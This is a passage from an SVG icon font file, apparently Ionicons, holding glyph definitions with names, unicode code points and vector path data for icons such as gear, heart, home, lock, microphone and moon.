c-3 10 -7 20 -12 30c-4 -1 -9 -1 -13 -1c-17 0 -34 7 -46 19c-10 10 -16 22 -18 35c-1 8 -2 16 0 24c-10 5 -20 9 -30 12c-4 -7 -10 -12 -17 -17c-11 -8 -24 -12 -37 -12s-26 4 -37 12c-7 5 -13 10 -17 17zM238 384v0c20 -5 40 -13 57 -24c-8 -18 -5 -40 10 -55
c10 -10 22 -14 35 -14c7 0 14 1 20 4c11 -17 19 -37 24 -57c-19 -7 -32 -25 -32 -46s14 -39 32 -46c-5 -20 -13 -40 -24 -57c-6 3 -13 4 -20 4c-13 0 -25 -4 -35 -14c-15 -15 -18 -37 -10 -55c-17 -11 -37 -19 -57 -24c-7 18 -25 32 -46 32s-39 -14 -46 -32
c-20 5 -40 13 -57 24c8 18 5 40 -10 55c-10 10 -22 14 -35 14c-7 0 -14 -1 -20 -4c-11 17 -19 37 -24 57c18 7 32 25 32 46s-13 39 -32 46c5 20 13 40 24 57c6 -3 13 -4 20 -4c13 0 25 4 35 14c15 15 18 37 10 55c17 11 37 19 57 24c7 -19 25 -32 46 -32s39 13 46 32z" />
    <glyph glyph-name="ion-ios-gear" unicode="&#xf43d;" horiz-adv-x="384" 
d="M352 192c0 -21 14 -39 32 -46c-5 -20 -13 -40 -24 -57c-6 3 -13 4 -20 4c-13 0 -25 -4 -35 -14c-15 -15 -18 -37 -10 -55c-17 -11 -37 -19 -57 -24c-7 18 -25 32 -46 32s-39 -14 -46 -32c-20 5 -40 13 -57 24c8 18 5 40 -10 55c-10 10 -22 14 -35 14c-7 0 -14 -1 -20 -4
c-11 17 -19 37 -24 57c18 7 32 25 32 46s-13 39 -32 46c5 20 13 40 24 57c6 -3 13 -4 20 -4c13 0 25 4 35 14c15 15 18 37 10 55c17 11 37 19 57 24c7 -19 25 -32 46 -32s39 13 46 32c20 -5 40 -13 57 -24c-8 -18 -5 -40 10 -55c10 -10 22 -14 35 -14c7 0 14 1 20 4
c11 -17 19 -37 24 -57c-19 -7 -32 -25 -32 -46zM193 112c44 0 80 36 80 80s-36 80 -80 80s-80 -36 -80 -80s36 -80 80 -80z" />
    <glyph glyph-name="ion-ios-glasses-outline" unicode="&#xf43e;" 
d="M433 201v0h15v-18h-15c-2 -22 -13 -43 -29 -58c-17 -16 -39 -25 -62 -25c-51 0 -92 41 -92 92v0v0c0 10 -12 22 -26 22s-26 -12 -26 -22v0v0c0 -51 -41 -92 -92 -92c-23 0 -45 9 -62 25c-16 15 -27 36 -29 58h-15v18h15c2 22 13 43 29 59c17 16 39 24 62 24
c42 0 78 -27 89 -67c7 7 18 12 29 12s22 -5 29 -12c11 40 47 67 89 67c23 0 45 -9 62 -25c16 -15 27 -36 29 -58zM342 115c42 0 77 35 77 77s-35 77 -77 77s-77 -35 -77 -77s35 -77 77 -77zM106 115c42 0 77 35 77 77s-35 77 -77 77s-77 -35 -77 -77s35 -77 77 -77z" />
    <glyph glyph-name="ion-ios-glasses" unicode="&#xf43f;" 
d="M433 201v0h15v-18h-15c-2 -22 -13 -43 -29 -58c-17 -16 -39 -25 -62 -25c-51 0 -92 41 -92 92v0v0c0 10 -12 22 -26 22s-26 -12 -26 -22v0v0c0 -51 -41 -92 -92 -92c-23 0 -45 9 -62 25c-16 15 -27 36 -29 58h-15v18h15c2 22 13 43 29 59c17 16 39 24 62 24
c42 0 78 -27 89 -67c7 7 18 12 29 12s22 -5 29 -12c11 40 47 67 89 67c23 0 45 -9 62 -25c16 -15 27 -36 29 -58z" />
    <glyph glyph-name="ion-ios-grid-view-outline" unicode="&#xf440;" horiz-adv-x="384" 
d="M384 256h-112v-128h112v-16h-112v-112h-16v112h-128v-112h-16v112h-112v16h112v128h-112v16h112v112h16v-112h128v112h16v-112h112v-16zM256 128v128h-128v-128h128z" />
    <glyph glyph-name="ion-ios-grid-view" unicode="&#xf441;" horiz-adv-x="384" 
d="M128 128v128h128v-128h-128zM0 384h384v-384h-384v384zM352 256v16h-80v80h-16v-80h-128v80h-16v-80h-80v-16h80v-128h-80v-16h80v-80h16v80h128v-80h16v80h80v16h-80v128h80z" />
    <glyph glyph-name="ion-ios-heart-outline" unicode="&#xf442;" 
d="M327 368c69 0 121 -43 121 -116c0 -31 -13 -71 -41 -105s-45 -52 -100 -88s-83 -43 -83 -43s-28 7 -83 43s-72 54 -100 88s-41 74 -41 105c0 73 52 116 121 116c39 0 82 -18 103 -53c21 35 64 53 103 53zM395 157c12 14 22 31 28 49c6 16 9 31 9 46c0 30 -10 56 -29 74
c-9 8 -20 15 -33 19c-13 5 -28 7 -43 7c-38 0 -73 -18 -89 -45l-14 -23l-14 23c-16 27 -51 45 -89 45c-15 0 -30 -2 -43 -7c-13 -4 -24 -11 -33 -19c-19 -18 -29 -44 -29 -74c0 -15 3 -30 9 -46c6 -18 16 -35 28 -49c27 -32 42 -49 97 -85c40 -27 65 -36 74 -39
c9 3 34 12 74 39c55 36 70 53 97 85z" />
    <glyph glyph-name="ion-ios-heart" unicode="&#xf443;" 
d="M327 368c69 0 121 -43 121 -116c0 -31 -13 -71 -41 -105s-45 -52 -100 -88s-83 -43 -83 -43s-28 7 -83 43s-72 54 -100 88s-41 74 -41 105c0 73 52 116 121 116c39 0 82 -18 103 -53c21 35 64 53 103 53z" />
    <glyph glyph-name="ion-ios-help-empty" unicode="&#xf444;" horiz-adv-x="128" 
d="M68 82c-9 0 -17 8 -17 17s8 17 17 17s17 -8 17 -17s-8 -17 -17 -17zM102 197c-23 -22 -22 -27 -23 -53h-19c1 28 7 43 30 64c11 10 19 24 19 39c0 24 -19 39 -42 39c-32 0 -49 -16 -48 -46h-19c0 42 25 62 68 62c33 0 60 -20 60 -54c0 -22 -11 -37 -26 -51z" />
    <glyph glyph-name="ion-ios-help-outline" unicode="&#xf445;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1c105 0 191 86 191 191s-86 191 -191 191s-191 -86 -191 -191s86 -191 191 -191zM212 302c33 0 60 -21 60 -55c0 -22 -11 -36 -26 -50c-23 -23 -22 -27 -23 -53h-19
c1 28 7 43 30 64c11 10 19 23 19 38c0 24 -19 40 -42 40c-32 0 -49 -16 -48 -46h-19c0 42 25 62 68 62zM212 116c9 0 17 -8 17 -17s-8 -17 -17 -17s-17 8 -17 17s8 17 17 17z" />
    <glyph glyph-name="ion-ios-help" unicode="&#xf446;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM212 82c9 0 17 8 17 17s-8 17 -17 17s-17 -8 -17 -17s8 -17 17 -17zM246 197c15 14 26 29 26 51c0 34 -27 54 -60 54c-43 0 -68 -20 -68 -62h19c-1 30 16 46 48 46
c23 0 42 -15 42 -39c0 -15 -8 -29 -19 -39c-23 -21 -29 -36 -30 -64h19c1 26 0 31 23 53z" />
    <glyph glyph-name="ion-ios-home-outline" unicode="&#xf447;" horiz-adv-x="384" 
d="M192 336l160 -128v-208h-112v128h-96v-128h-112v208zM336 16v184l-144 116l-144 -116v-184h80v128h128v-128h80zM192 384l192 -153l-12 -12l-180 145l-180 -145l-12 12l32 25v96h64v-45zM80 294v42h-32v-67z" />
    <glyph glyph-name="ion-ios-home" unicode="&#xf448;" horiz-adv-x="384" 
d="M192 336l160 -128v-208h-112v128h-96v-128h-112v208zM192 384l192 -153l-12 -12l-180 145l-180 -145l-12 12l32 25v96h64v-45z" />
    <glyph glyph-name="ion-ios-infinite-outline" unicode="&#xf449;" 
d="M419 260c19 -19 29 -43 29 -68s-10 -49 -29 -68c-19 -18 -44 -28 -70 -28s-50 10 -69 28l-126 123c-15 15 -35 22 -56 22s-40 -7 -55 -22c-31 -30 -31 -80 0 -110c15 -15 34 -22 55 -22s41 7 56 22l43 42l13 -14l-42 -41c-19 -18 -44 -28 -70 -28s-50 10 -69 28
c-19 19 -29 43 -29 68s10 49 29 68c19 18 43 28 69 28s51 -10 70 -28l126 -123c15 -15 34 -22 55 -22s41 7 56 22c31 30 31 80 0 110c-15 15 -35 22 -56 22s-40 -7 -55 -22l-43 -42l-13 14l42 41c19 18 44 28 70 28s50 -10 69 -28z" />
    <glyph glyph-name="ion-ios-infinite" unicode="&#xf44a;" horiz-adv-x="464" 
d="M433 266c20 -20 31 -46 31 -74s-11 -54 -31 -74s-48 -30 -76 -30s-55 10 -75 30l-125 123c-13 13 -32 20 -51 20s-37 -7 -50 -20s-21 -31 -21 -49c0 -19 8 -36 21 -49s31 -20 50 -20s38 7 51 20l39 38l25 -25l-39 -38c-20 -20 -48 -30 -76 -30s-55 10 -75 30
s-31 46 -31 74s11 54 31 74s47 30 75 30s56 -10 76 -30l125 -123c13 -13 31 -20 50 -20s38 7 51 20s20 31 20 49c0 19 -7 36 -20 49s-32 20 -51 20s-37 -7 -50 -20l-39 -38l-25 25l39 38c20 20 48 30 76 30s55 -10 75 -30z" />
    <glyph glyph-name="ion-ios-information-empty" unicode="&#xf44b;" horiz-adv-x="64" 
d="M8 276c0 13 7 20 20 20s20 -7 20 -20s-7 -20 -20 -20s-20 7 -20 20zM48 104h16v-8h-64v8h16v120h-16v8h48v-128z" />
    <glyph glyph-name="ion-ios-information-outline" unicode="&#xf44c;" horiz-adv-x="416" 
d="M184 276c0 13 7 20 20 20s20 -7 20 -20s-7 -20 -20 -20s-20 7 -20 20zM224 104h16v-8h-64v8h16v120h-16v8h48v-128zM208 400c57 0 106 -20 147 -61s61 -90 61 -147s-20 -106 -61 -147s-90 -61 -147 -61s-106 20 -147 61s-61 90 -61 147s20 106 61 147s90 61 147 61z
M208 1c53 0 98 19 135 56s56 82 56 135s-19 98 -56 135s-82 56 -135 56s-98 -19 -135 -56s-56 -82 -56 -135s19 -98 56 -135s82 -56 135 -56z" />
    <glyph glyph-name="ion-ios-information" unicode="&#xf44d;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM204 296c-11 0 -20 -9 -20 -20s9 -20 20 -20s20 9 20 20s-9 20 -20 20zM240 96v8h-16v128h-48v-8h16v-120h-16v-8h64z" />
    <glyph glyph-name="ion-ios-ionic-outline" unicode="&#xf44e;" horiz-adv-x="416" 
d="M378 313c24 -34 38 -76 38 -121c0 -115 -92 -208 -207 -208s-209 93 -209 208s94 208 209 208c45 0 86 -14 120 -38c6 5 13 8 21 8c19 0 35 -16 35 -35c0 -8 -2 -16 -7 -22zM350 357c-12 0 -22 -10 -22 -22s10 -22 22 -22s22 10 22 22s-10 22 -22 22zM344 56
c18 18 31 39 41 62c10 24 15 48 15 74s-5 51 -15 75c-5 13 -12 25 -20 36c-5 -2 -10 -3 -15 -3c-19 0 -35 16 -35 35c0 5 2 11 4 15c-11 8 -23 15 -36 20c-24 10 -49 14 -75 14s-51 -4 -75 -14c-23 -10 -43 -24 -61 -42s-31 -38 -41 -61c-10 -24 -15 -49 -15 -75
s5 -50 15 -74c10 -23 23 -44 41 -62s38 -31 61 -41c24 -10 49 -15 75 -15s51 5 75 15c23 10 43 23 61 41zM208 288c53 0 96 -43 96 -96s-43 -96 -96 -96s-96 43 -96 96s43 96 96 96zM208 112c44 0 80 36 80 80s-36 80 -80 80s-79 -36 -79 -80s35 -80 79 -80z" />
    <glyph glyph-name="ion-ios-keypad-outline" unicode="&#xf44f;" horiz-adv-x="384" 
d="M331 107c30 0 53 -24 53 -54s-23 -53 -53 -53s-54 23 -54 53s24 54 54 54zM331 16c21 0 37 16 37 37s-16 38 -37 38s-38 -17 -38 -38s17 -37 38 -37zM192 107c30 0 53 -24 53 -54s-23 -53 -53 -53s-53 23 -53 53s23 54 53 54zM192 16c21 0 37 16 37 37s-16 38 -37 38
s-37 -17 -37 -38s16 -37 37 -37zM53 107c30 0 54 -24 54 -54s-24 -53 -54 -53s-53 23 -53 53s23 54 53 54zM53 16c21 0 38 16 38 37s-17 38 -38 38s-37 -17 -37 -38s16 -37 37 -37zM331 245c30 0 53 -23 53 -53s-23 -53 -53 -53s-54 23 -54 53s24 53 54 53zM331 155
c21 0 37 16 37 37s-16 37 -37 37s-38 -16 -38 -37s17 -37 38 -37zM192 245c30 0 53 -23 53 -53s-23 -53 -53 -53s-53 23 -53 53s23 53 53 53zM192 155c21 0 37 16 37 37s-16 37 -37 37s-37 -16 -37 -37s16 -37 37 -37zM53 245c30 0 54 -23 54 -53s-24 -53 -54 -53
s-53 23 -53 53s23 53 53 53zM53 155c21 0 38 16 38 37s-17 37 -38 37s-37 -16 -37 -37s16 -37 37 -37zM331 277c-30 0 -54 24 -54 54s24 53 54 53s53 -23 53 -53s-23 -54 -53 -54zM331 368c-21 0 -38 -16 -38 -37s17 -38 38 -38s37 17 37 38s-16 37 -37 37zM192 384
c30 0 53 -23 53 -53s-23 -54 -53 -54s-53 24 -53 54s23 53 53 53zM192 293c21 0 37 17 37 38s-16 37 -37 37s-37 -16 -37 -37s16 -38 37 -38zM53 384c30 0 54 -23 54 -53s-24 -54 -54 -54s-53 24 -53 54s23 53 53 53zM53 293c21 0 38 17 38 38s-17 37 -38 37
s-37 -16 -37 -37s16 -38 37 -38z" />
    <glyph glyph-name="ion-ios-keypad" unicode="&#xf450;" horiz-adv-x="384" 
d="M331 107c30 0 53 -24 53 -54s-23 -53 -53 -53s-54 23 -54 53s24 54 54 54zM192 107c30 0 53 -24 53 -54s-23 -53 -53 -53s-53 23 -53 53s23 54 53 54zM53 107c30 0 54 -24 54 -54s-24 -53 -54 -53s-53 23 -53 53s23 54 53 54zM331 245c30 0 53 -23 53 -53
s-23 -53 -53 -53s-54 23 -54 53s24 53 54 53zM192 245c30 0 53 -23 53 -53s-23 -53 -53 -53s-53 23 -53 53s23 53 53 53zM53 245c30 0 54 -23 54 -53s-24 -53 -54 -53s-53 23 -53 53s23 53 53 53zM331 277c-30 0 -54 24 -54 54s24 53 54 53s53 -23 53 -53s-23 -54 -53 -54z
M192 384c30 0 53 -23 53 -53s-23 -54 -53 -54s-53 24 -53 54s23 53 53 53zM53 384c30 0 54 -23 54 -53s-24 -54 -54 -54s-53 24 -53 54s23 53 53 53z" />
    <glyph glyph-name="ion-ios-lightbulb-outline" unicode="&#xf451;" horiz-adv-x="288" 
d="M288 275c0 -31 -13 -59 -30 -83v0c-11 -15 -22 -28 -32 -45c-22 -38 -18 -73 -18 -82v-1h-128v1c0 7 3 44 -19 82c-10 17 -20 30 -31 45v0c-17 24 -30 52 -30 83c0 78 66 141 144 141s144 -63 144 -141zM239 194l6 8c16 22 27 47 27 73c0 33 -16 65 -40 89s-55 36 -88 36
s-64 -12 -88 -36s-40 -56 -40 -89c0 -26 11 -51 27 -73l19 -26v0c5 -6 9 -13 13 -21c17 -29 21 -58 21 -75h16v112l-32 64h17l31 -64v-112h32v112l31 64h17l-32 -64v-112h16c0 17 4 45 21 75c8 14 16 25 24 36c1 1 1 2 2 3zM112 -32v16h64v-16h-64zM96 0v16h96v-16h-96z
M96 32v16h96v-16h-96z" />
    <glyph glyph-name="ion-ios-lightbulb" unicode="&#xf452;" horiz-adv-x="288" 
d="M288 275c0 -31 -13 -59 -30 -83v0c-11 -15 -22 -28 -32 -45c-22 -38 -18 -73 -18 -82v-1h-32v128l32 64h-16l-32 -64v-128h-32v128l-31 64h-17l32 -64v-128h-32v1c0 7 3 44 -19 82c-10 17 -20 30 -31 45v0c-17 24 -30 52 -30 83c0 78 66 141 144 141s144 -63 144 -141z
M112 -32v16h64v-16h-64zM96 0v16h96v-16h-96zM96 32v16h96v-16h-96z" />
    <glyph glyph-name="ion-ios-list-outline" unicode="&#xf453;" horiz-adv-x="384" 
d="M368 368h-352v-352h352v352zM384 384v0v-384h-384v384h384zM128 280v16h192v-16h-192zM128 184v16h192v-16h-192zM128 88v16h192v-16h-192zM64 288c0 11 5 16 16 16s16 -5 16 -16s-5 -16 -16 -16s-16 5 -16 16zM64 192c0 11 5 16 16 16s16 -5 16 -16s-5 -16 -16 -16
s-16 5 -16 16zM64 96c0 11 5 16 16 16s16 -5 16 -16s-5 -16 -16 -16s-16 5 -16 16z" />
    <glyph glyph-name="ion-ios-list" unicode="&#xf454;" horiz-adv-x="384" 
d="M0 384h384v-384h-384v384zM80 80c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16zM80 176c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16zM80 272c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16zM320 88v16h-192v-16h192zM320 184v16
h-192v-16h192zM320 280v16h-192v-16h192z" />
    <glyph glyph-name="ion-ios-location-outline" unicode="&#xf455;" horiz-adv-x="288" 
d="M144 400c-34 0 -67 -13 -91 -37s-37 -57 -37 -91c0 -43 24 -107 70 -186c22 -38 44 -72 58 -91c14 19 36 53 58 91c46 79 70 143 70 186c0 34 -13 67 -37 91s-57 37 -91 37zM144 416v0c80 0 144 -64 144 -144c0 -112 -144 -304 -144 -304s-144 192 -144 304
c0 80 64 144 144 144zM144 336c35 0 64 -29 64 -64s-29 -64 -64 -64s-64 29 -64 64s29 64 64 64zM144 225c26 0 47 21 47 47s-21 47 -47 47s-47 -21 -47 -47s21 -47 47 -47z" />
    <glyph glyph-name="ion-ios-location" unicode="&#xf456;" horiz-adv-x="288" 
d="M144 416c80 0 144 -64 144 -144c0 -112 -144 -304 -144 -304s-144 192 -144 304c0 80 64 144 144 144zM144 225c26 0 47 21 47 47s-21 47 -47 47s-47 -21 -47 -47s21 -47 47 -47z" />
    <glyph glyph-name="ion-ios-locked-outline" unicode="&#xf457;" horiz-adv-x="320" 
d="M264 224h56v-240h-320v240h56v72c0 57 47 104 104 104s104 -47 104 -104v-72zM72 296v-72h176v72c0 49 -39 88 -88 88s-88 -39 -88 -88zM304 0v208h-288v-208h288zM160 160c18 0 32 -14 32 -32c0 -15 -10 -27 -24 -31v-33h-16v33c-14 4 -24 16 -24 31c0 18 14 32 32 32z
M160 112c9 0 16 7 16 16s-7 16 -16 16s-16 -7 -16 -16s7 -16 16 -16z" />
    <glyph glyph-name="ion-ios-locked" unicode="&#xf458;" horiz-adv-x="320" 
d="M264 224h56v-240h-320v240h56v72c0 57 47 104 104 104s104 -47 104 -104v-72zM168 97c14 4 24 16 24 31c0 18 -14 32 -32 32s-32 -14 -32 -32c0 -15 10 -27 24 -31v-33h16v33zM248 224v72c0 49 -39 88 -88 88s-88 -39 -88 -88v-72h176zM160 144c9 0 16 -7 16 -16
s-7 -16 -16 -16s-16 7 -16 16s7 16 16 16z" />
    <glyph glyph-name="ion-ios-loop-strong" unicode="&#xf459;" horiz-adv-x="512" 
d="M256 400c115 0 208 -93 208 -208c0 -14 -1 -28 -4 -42l-1 -4l-24 5l1 4c2 12 4 24 4 37c0 101 -83 184 -184 184c-66 0 -127 -36 -160 -94l-2 -3l-21 11l2 4c37 65 106 106 181 106zM416 102l2 3l21 -11l-2 -4c-37 -65 -106 -106 -181 -106c-115 0 -208 93 -208 208
c0 14 1 28 4 42l1 4l24 -5l-1 -4c-2 -12 -4 -24 -4 -37c0 -101 83 -184 184 -184c66 0 127 36 160 94zM384 192h128l-64 -64zM0 192l64 64l64 -64h-128z" />
    <glyph glyph-name="ion-ios-loop" unicode="&#xf45a;" horiz-adv-x="489" 
d="M478 192l11 -11l-52 -53l-53 53l10 11l43 -41zM449 192v0v0c0 -7 0 -14 -1 -21l-16 1c1 7 1 14 1 21c-1 103 -85 187 -188 187c-68 0 -131 -37 -164 -96l-14 8c36 64 104 104 178 104c112 0 203 -91 204 -202v0v-2zM409 100l14 -8c-36 -64 -104 -104 -178 -104
c-111 0 -202 90 -204 200v0v3v1v0c0 7 0 14 1 21l16 -1c-1 -7 -1 -14 -1 -21c0 -103 85 -187 188 -187c68 0 131 37 164 96zM53 256l52 -53l-11 -11l-41 41l-42 -41l-11 11z" />
    <glyph glyph-name="ion-ios-medical-outline" unicode="&#xf45b;" horiz-adv-x="364" 
d="M364 260l-118 -68l118 -68l-32 -56l-118 69v-137h-64v137l-118 -69l-32 56l118 68l-118 68l32 56l118 -69v137h64v-137l118 69zM342 118l-128 74l128 74l-16 28l-128 -74v148h-32v-148l-128 74l-16 -28l128 -74l-128 -74l16 -28l128 74v-148h32v148l128 -74z" />
    <glyph glyph-name="ion-ios-medical" unicode="&#xf45c;" horiz-adv-x="364" 
d="M364 260l-118 -68l118 -68l-32 -56l-118 69v-137h-64v137l-118 -69l-32 56l118 68l-118 68l32 56l118 -69v137h64v-137l118 69z" />
    <glyph glyph-name="ion-ios-medkit-outline" unicode="&#xf45d;" horiz-adv-x="416" 
d="M224 240h-32v-48v-16h-16h-48v-32h48h16v-16v-48h32v48v16h16h48v32h-48h-16v16v48zM240 256v0v-64h64v-64h-64v-64h-64v64h-64v64h64v64h64zM288 320h128v-320h-416v320h128v32c0 18 10 32 29 32h99c19 0 32 -14 32 -32v-32zM144 350v-30h128v30c0 10 -7 18 -17 18h-97
c-11 0 -14 -8 -14 -18zM400 16v288h-384v-288h384z" />
    <glyph glyph-name="ion-ios-medkit" unicode="&#xf45e;" horiz-adv-x="416" 
d="M224 176h16h48v-32h-48h-16v-16v-48h-32v48v16h-16h-48v32h48h16v16v48h32v-48v-16zM288 320h128v-320h-416v320h128v32c0 18 10 32 29 32h99c19 0 32 -14 32 -32v-32zM144 350v-30h128v30c0 10 -7 18 -17 18h-97c-11 0 -14 -8 -14 -18zM304 128v64h-64v64h-64v-64h-64
v-64h64v-64h64v64h64z" />
    <glyph glyph-name="ion-ios-mic-off" unicode="&#xf45f;" horiz-adv-x="280" 
d="M266 -32l-258 440l14 8l258 -440zM128 95c-44 0 -79 37 -79 83v118l113 -193c-10 -5 -22 -8 -34 -8zM207 178c0 -10 -2 -19 -5 -28l-136 234c14 20 37 32 62 32c44 0 79 -38 79 -84v-154zM256 176c0 -28 -9 -54 -24 -75l-10 17c11 17 17 36 17 58v80h17v-80zM139 49v0
v-63h69v-18h-161v18h73v63c-67 5 -120 60 -120 127v80h19v-80c0 -60 50 -109 110 -109c17 0 34 4 48 11l9 -16c-14 -7 -30 -12 -47 -13z" />
    <glyph glyph-name="ion-ios-mic-outline" unicode="&#xf460;" horiz-adv-x="256" 
d="M128 416c44 0 79 -38 79 -84v-154c0 -46 -35 -84 -79 -84s-79 38 -79 84v154c0 46 35 84 79 84zM191 178v154c0 37 -28 68 -63 68s-63 -31 -63 -68v-154c0 -37 28 -68 63 -68s63 31 63 68zM239 256h17v-80c0 -67 -51 -122 -117 -127v-63h69v-18h-161v18h73v63
c-67 5 -120 60 -120 127v80h19v-80c0 -60 50 -109 110 -109s110 49 110 109v80z" />
    <glyph glyph-name="ion-ios-mic" unicode="&#xf461;" horiz-adv-x="256" 
d="M128 94c-44 0 -79 38 -79 84v154c0 46 35 84 79 84s79 -38 79 -84v-154c0 -46 -35 -84 -79 -84zM239 256h17v-80c0 -67 -51 -122 -117 -127v-63h69v-18h-161v18h73v63c-67 5 -120 60 -120 127v80h19v-80c0 -60 50 -109 110 -109s110 49 110 109v80z" />
    <glyph glyph-name="ion-ios-minus-empty" unicode="&#xf462;" horiz-adv-x="256" 
d="M256 183h-256v17h256v-17z" />
    <glyph glyph-name="ion-ios-minus-outline" unicode="&#xf463;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 1c105 0 191 86 191 191s-86 191 -191 191s-191 -86 -191 -191s86 -191 191 -191zM80 183v17h256v-17h-256z" />
    <glyph glyph-name="ion-ios-minus" unicode="&#xf464;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM336 183v17h-256v-17h256z" />
    <glyph glyph-name="ion-ios-monitor-outline" unicode="&#xf465;" horiz-adv-x="480" 
d="M480 64h-176v-16h64v-16h-257v16h64v16h-175v288h480v-288zM16 336v-256h448v256h-448z" />
    <glyph glyph-name="ion-ios-monitor" unicode="&#xf466;" horiz-adv-x="480" 
d="M480 64h-176v-16h64v-16h-257v16h64v16h-175v288h480v-288zM16 336v-256h448v256h-448zM32 96v224h416v-224h-416z" />
    <glyph glyph-name="ion-ios-moon-outline" unicode="&#xf467;" horiz-adv-x="216" 
d="M195 133c7 0 14 1 21 3c-4 -7 -7 -12 -12 -18c-21 -25 -53 -41 -88 -41c-64 0 -116 51 -116 115c0 52 34 96 81 111c7 2 14 3 22 4c-4 -6 -8 -12 -11 -18c-7 -14 -11 -30 -11 -47c0 -29 11 -56 32 -77s48 -32 77 -32h5zM116 93c25 0 48 9 65 24c-65 5 -116 59 -116 125
c0 14 2 28 6 40c-33 -16 -55 -51 -55 -90c0 -55 45 -99 100 -99z" />
    <glyph glyph-name="ion-ios-moon" unicode="&#xf468;" horiz-adv-x="216" 
d="M195 133c7 0 14 1 21 3c-4 -7 -7 -12 -12 -18c-21 -25 -53 -41 -88 -41c-64 0 -116 51 -116 115c0 52 34 96 81 111c7 2 14 3 22 4c-4 -6 -8 -12 -11 -18c-7 -14 -11 -30 -11 -47c0 -29 11 -56 32 -77s48 -32 77 -32h5z" />
    <glyph glyph-name="ion-ios-more-outline" unicode="&#xf469;" horiz-adv-x="320" 
d="M160 210c-10 0 -18 -8 -18 -18s8 -18 18 -18s18 8 18 18s-8 18 -18 18zM160 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32s-32 14 -32 32s14 32 32 32zM32 210c-10 0 -18 -8 -18 -18s8 -18 18 -18s18 8 18 18s-8 18 -18 18zM32 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32
s-32 14 -32 32s14 32 32 32zM288 210c-10 0 -18 -8 -18 -18s8 -18 18 -18s18 8 18 18s-8 18 -18 18zM288 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32s-32 14 -32 32s14 32 32 32z" />
    <glyph glyph-name="ion-ios-more" unicode="&#xf46a;" horiz-adv-x="320" 
d="M160 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32s-32 14 -32 32s14 32 32 32zM32 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32s-32 14 -32 32s14 32 32 32zM288 224v0c18 0 32 -14 32 -32s-14 -32 -32 -32s-32 14 -32 32s14 32 32 32z" />
    <glyph glyph-name="ion-ios-musical-note" unicode="&#xf46b;" horiz-adv-x="192" 
d="M192 346v-1v-65c0 -3 -3 -6 -6 -5v0l-73 13v-192c0 -33 1 -80 -51 -82c-48 -2 -62 16 -62 41c0 19 9 39 51 41c22 1 37 1 45 1v273l90 -19l2 -1c2 0 3 -1 4 -3v0v-1v0z" />
    <glyph glyph-name="ion-ios-musical-notes" unicode="&#xf46c;" horiz-adv-x="320" 
d="M320 128c0 -34 4 -80 -49 -82c-49 -2 -62 16 -62 41c0 20 9 39 52 41c23 1 34 2 43 2v160l-191 -32v-161c0 -34 3 -81 -50 -83c-49 -2 -63 17 -63 42c0 20 9 39 52 41c23 1 35 1 44 1v237l224 35v-242z" />
    <glyph glyph-name="ion-ios-navigate-outline" unicode="&#xf46d;" horiz-adv-x="416" 
d="M208 384c-51 0 -99 -21 -135 -57s-57 -84 -57 -135s21 -99 57 -135s84 -57 135 -57s99 21 135 57s57 84 57 135s-21 99 -57 135s-84 57 -135 57zM208 400v0c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM304 288l-96 -224v128h-128z" />
    <glyph glyph-name="ion-ios-navigate" unicode="&#xf46e;" horiz-adv-x="416" 
d="M208 400c115 0 208 -93 208 -208s-93 -208 -208 -208s-208 93 -208 208s93 208 208 208zM208 64l96 224l-224 -96h128v-128z" />
    <glyph glyph-name="ion-ios-nutrition-outline" unicode="&#xf46f;" horiz-adv-x="384" 
d="M294 214v0c6 -6 10 -14 10 -23c0 -11 -5 -20 -13 -26v0s-51 -37 -106 -77l-38 31c-2 2 -4 3 -6 3c-1 0 -2 0 -3 -1v0c-2 -2 -2 -6 1 -10l29 -35l-115 -84c-6 -4 -13 -8 -21 -8c-18 0 -32 14 -32 32c0 7 1 13 4 18v0c2 2 17 25 37 57l21 -17c2 -2 4 -2 6 -2c1 0 3 0 4 1v0
c2 2 1 6 -2 10l-19 23c27 43 60 96 84 134l36 -30c2 -2 4 -3 6 -3c1 0 2 1 3 2v0c2 2 2 5 -1 9l-33 40c11 18 19 29 19 29v0c6 10 15 16 27 16c9 0 18 -4 24 -10v0l78 -79v0v0zM282 178c4 3 6 8 6 13c0 4 -2 9 -5 12l-5 4v1l-69 69v0l-5 5c-3 3 -8 5 -12 5
c-6 0 -10 -3 -13 -8l-5 -8c-2 -3 -5 -7 -8 -12l25 -30v0l1 -1c8 -10 8 -22 0 -30l-1 -1l-1 -1c-4 -3 -8 -5 -13 -5s-11 2 -16 6v1h-1l-21 18l-24 -39l-44 -70l12 -14v0v0c8 -10 8 -23 0 -31v0c-4 -4 -9 -6 -15 -6c-5 0 -11 2 -16 6v0v0l-7 5c-3 -5 -5 -9 -8 -13
c-12 -19 -16 -26 -18 -29c-1 -3 -2 -6 -2 -9c0 -9 7 -16 16 -16c3 0 6 2 11 5l101 74l-18 22h-1v0c-8 10 -8 23 0 31v0v0v0c4 4 10 6 15 6s11 -2 16 -6v0h1l28 -24c49 36 93 68 96 70zM376 333l8 -14l-5 -3l-103 -60l-17 17l71 123l2 4l14 -8l-3 -4l-63 -111l91 53z" />
    <glyph glyph-name="ion-ios-nutrition" unicode="&#xf470;" horiz-adv-x="384" 
